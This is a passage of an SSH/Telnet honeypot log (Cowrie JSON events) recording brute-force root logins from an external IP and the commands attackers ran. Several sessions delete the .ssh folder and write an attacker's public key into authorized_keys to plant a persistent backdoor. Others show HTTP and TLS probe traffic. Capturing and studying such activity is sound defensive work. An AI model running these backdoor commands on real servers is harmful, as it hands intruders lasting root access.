AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:17:08.657505Z","src_ip":"212.227.235.229","session":"03fbc05781a3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:17:08.744278Z","src_ip":"212.227.235.229","session":"03fbc05781a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:17:08.745240Z","src_ip":"212.227.235.229","session":"03fbc05781a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38244,"dst_ip":"1.2.3.4","dst_port":22,"session":"6efcea0813a6","protocol":"ssh","message":"New connection: 212.227.235.229:38244 (1.2.3.4:22) [session: 6efcea0813a6]","sensor":"my-vps","timestamp":"2025-09-09T08:17:08.827964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:17:08.828826Z","src_ip":"212.227.235.229","session":"6efcea0813a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:17:08.913617Z","src_ip":"212.227.235.229","session":"6efcea0813a6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:17:09.293305Z","src_ip":"212.227.235.229","session":"6efcea0813a6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:17:10.384733Z","src_ip":"212.227.235.229","session":"6efcea0813a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38256,"dst_ip":"1.2.3.4","dst_port":22,"session":"8aead6017bc4","protocol":"ssh","message":"New connection: 212.227.235.229:38256 (1.2.3.4:22) [session: 8aead6017bc4]","sensor":"my-vps","timestamp":"2025-09-09T08:17:10.468664Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:17:10.469601Z","src_ip":"212.227.235.229","session":"8aead6017bc4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:17:10.554356Z","src_ip":"212.227.235.229","session":"8aead6017bc4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:17:10.938738Z","src_ip":"212.227.235.229","session":"8aead6017bc4"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:17:11.025443Z","src_ip":"212.227.235.229","session":"03fbc05781a3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:17:11.026401Z","src_ip":"212.227.235.229","session":"8aead6017bc4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"89219ac2f7c2","protocol":"ssh","message":"New connection: 212.227.235.229:51824 (1.2.3.4:22) [session: 89219ac2f7c2]","sensor":"my-vps","timestamp":"2025-09-09T08:17:35.071435Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:17:35.158952Z","src_ip":"212.227.235.229","session":"89219ac2f7c2"}
{"eventid":"cowrie.session.connect","src_ip":"3.132.23.201","src_port":57692,"dst_ip":"1.2.3.4","dst_port":23,"session":"a38eef3105c6","protocol":"telnet","message":"New connection: 3.132.23.201:57692 (1.2.3.4:23) [session: a38eef3105c6]","sensor":"my-vps","timestamp":"2025-09-09T08:18:10.263488Z"}
{"eventid":"cowrie.session.closed","duration":0.1454453468322754,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:18:10.408869Z","src_ip":"3.132.23.201","session":"a38eef3105c6"}
{"eventid":"cowrie.session.connect","src_ip":"3.132.23.201","src_port":40370,"dst_ip":"1.2.3.4","dst_port":23,"session":"130ce67d5b29","protocol":"telnet","message":"New connection: 3.132.23.201:40370 (1.2.3.4:23) [session: 130ce67d5b29]","sensor":"my-vps","timestamp":"2025-09-09T08:18:11.084251Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET / HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-09-09T08:18:11.086182Z","src_ip":"3.132.23.201","session":"130ce67d5b29"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-09-09T08:18:11.087042Z","src_ip":"3.132.23.201","session":"130ce67d5b29"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-09-09T08:18:11.088024Z","src_ip":"3.132.23.201","session":"130ce67d5b29"}
{"eventid":"cowrie.session.closed","duration":0.13944435119628906,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:18:11.223576Z","src_ip":"3.132.23.201","session":"130ce67d5b29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42196,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae202fbc5629","protocol":"ssh","message":"New connection: 212.227.235.229:42196 (1.2.3.4:22) [session: ae202fbc5629]","sensor":"my-vps","timestamp":"2025-09-09T08:18:19.520936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:18:19.521864Z","src_ip":"212.227.235.229","session":"ae202fbc5629"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:18:19.604769Z","src_ip":"212.227.235.229","session":"ae202fbc5629"}
{"eventid":"cowrie.login.success","username":"root","password":"@@@@","message":"login attempt [root/@@@@] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:18:19.939813Z","src_ip":"212.227.235.229","session":"ae202fbc5629"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:18:20.171465Z","src_ip":"212.227.235.229","session":"ae202fbc5629"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:18:20.172182Z","src_ip":"212.227.235.229","session":"ae202fbc5629"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:18:20.173736Z","src_ip":"212.227.235.229","session":"ae202fbc5629"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:18:20.259383Z","src_ip":"212.227.235.229","session":"ae202fbc5629"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:18:20.445296Z","src_ip":"212.227.235.229","session":"ae202fbc5629"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:18:20.446041Z","src_ip":"212.227.235.229","session":"ae202fbc5629"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:18:20.532549Z","src_ip":"212.227.235.229","session":"ae202fbc5629"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:18:20.533599Z","src_ip":"212.227.235.229","session":"ae202fbc5629"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42208,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8f4cdeca9c8","protocol":"ssh","message":"New connection: 212.227.235.229:42208 (1.2.3.4:22) [session: e8f4cdeca9c8]","sensor":"my-vps","timestamp":"2025-09-09T08:18:20.617361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:18:20.618176Z","src_ip":"212.227.235.229","session":"e8f4cdeca9c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:18:20.702895Z","src_ip":"212.227.235.229","session":"e8f4cdeca9c8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:18:21.087124Z","src_ip":"212.227.235.229","session":"e8f4cdeca9c8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:18:22.187451Z","src_ip":"212.227.235.229","session":"e8f4cdeca9c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38654,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcf7446b636c","protocol":"ssh","message":"New connection: 212.227.235.229:38654 (1.2.3.4:22) [session: dcf7446b636c]","sensor":"my-vps","timestamp":"2025-09-09T08:18:22.271040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:18:22.272013Z","src_ip":"212.227.235.229","session":"dcf7446b636c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:18:22.356916Z","src_ip":"212.227.235.229","session":"dcf7446b636c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:18:22.738397Z","src_ip":"212.227.235.229","session":"dcf7446b636c"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:18:22.824675Z","src_ip":"212.227.235.229","session":"ae202fbc5629"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:18:22.825562Z","src_ip":"212.227.235.229","session":"dcf7446b636c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39918,"dst_ip":"1.2.3.4","dst_port":22,"session":"bdf3a059310f","protocol":"ssh","message":"New connection: 212.227.235.229:39918 (1.2.3.4:22) [session: bdf3a059310f]","sensor":"my-vps","timestamp":"2025-09-09T08:18:33.448395Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-09T08:18:33.523114Z","src_ip":"212.227.235.229","session":"bdf3a059310f"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:18:33.524142Z","src_ip":"212.227.235.229","session":"bdf3a059310f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7880,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6b235210dcd","protocol":"ssh","message":"New connection: 212.227.235.229:7880 (1.2.3.4:22) [session: d6b235210dcd]","sensor":"my-vps","timestamp":"2025-09-09T08:18:37.281394Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\u0010\u0018Z<.:\\xf3\u0005\\xb8S\\xaaJr\\xff}\u001b\\xc0\\xe6\\xcfN\\x8fU4G\\xb7\\x94\\x8c\\xe0\\x99\\xd7`\u0000\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\u0010\u0018Z<.:\\xf3\u0005\\xb8S\\xaaJr\\xff}\u001b\\xc0\\xe6\\xcfN\\x8fU4G\\xb7\\x94\\x8c\\xe0\\x99\\xd7`\u0000\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-09-09T08:18:37.282580Z","src_ip":"212.227.235.229","session":"d6b235210dcd"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:18:37.283640Z","src_ip":"212.227.235.229","session":"d6b235210dcd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44376,"dst_ip":"1.2.3.4","dst_port":22,"session":"c004f8b03a11","protocol":"ssh","message":"New connection: 212.227.235.229:44376 (1.2.3.4:22) [session: c004f8b03a11]","sensor":"my-vps","timestamp":"2025-09-09T08:19:29.799474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:19:29.800517Z","src_ip":"212.227.235.229","session":"c004f8b03a11"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:19:29.884487Z","src_ip":"212.227.235.229","session":"c004f8b03a11"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678a@","message":"login attempt [root/12345678a@] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:19:30.267948Z","src_ip":"212.227.235.229","session":"c004f8b03a11"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:19:30.501644Z","src_ip":"212.227.235.229","session":"c004f8b03a11"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:19:30.502316Z","src_ip":"212.227.235.229","session":"c004f8b03a11"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:19:30.503293Z","src_ip":"212.227.235.229","session":"c004f8b03a11"}
